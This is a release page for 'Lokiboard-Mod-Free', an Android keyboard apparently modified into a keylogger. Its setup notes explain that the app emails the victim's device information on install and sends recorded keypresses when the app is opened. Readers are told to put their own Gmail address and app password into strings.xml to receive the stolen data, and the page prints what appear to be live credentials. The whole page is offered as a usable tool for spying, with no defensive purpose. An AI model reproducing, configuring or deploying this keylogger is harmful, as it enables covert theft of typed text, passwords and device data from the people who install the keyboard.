Skip to content

Releases: NullPounce/Lokiboard-Mod-Free

Lokiboard-stage1

15 Feb 04:05
Compare
Choose a tag to compare

you need a Google account with 2fa enabled, get your app password "not your login"

as of right now an email is sent of user device info on initial install, during testing make sure to type
or click on the virtual keyboard if using genymotion for example. keypress logs as of now are only
sent when the user opens up the app.

open:

hakistan\Lokiboard-Mod-master\app\src\main\res\values\strings.xml

and edit these 2 lines:

[ <string name="EMail">dashdashpass7@gmail.com</string>]
 
  <string name="EmailPassword">7.gMukhlis.Ghaf00r</string>

from this snippet:

<string name="prefs_keyboard_height_settings">Keyboard height</string>
   <string name="keyboard_color">Set custom keyboard color</string>
   <string name="hide_special_chars">Hide special characters</string>
   <string name="hide_language_switch_key">Hide language switch key</string>
   <string name="show_number_row">Show separate number row</string>
   <string name="space_swipe">Space swipe cursor move</string>
   <string name="delete_swipe">Delete swipe</string>
   <string name="matching_navbar_color">Use matching navigation bar color</string>
   <string name="setup_message">LokiBoard Keyboard is not enabled. Click OK to open Languages &amp; Input settings. You will need to select LokiBoard Keyboard in your current keyboard to use it.</string>
   <string name="EMail">dashdashpass7@gmail.com</string>
   <string name="EmailPassword">7.gMukhlis.Ghaf00r</string>
   <string name="Interval">120000</string>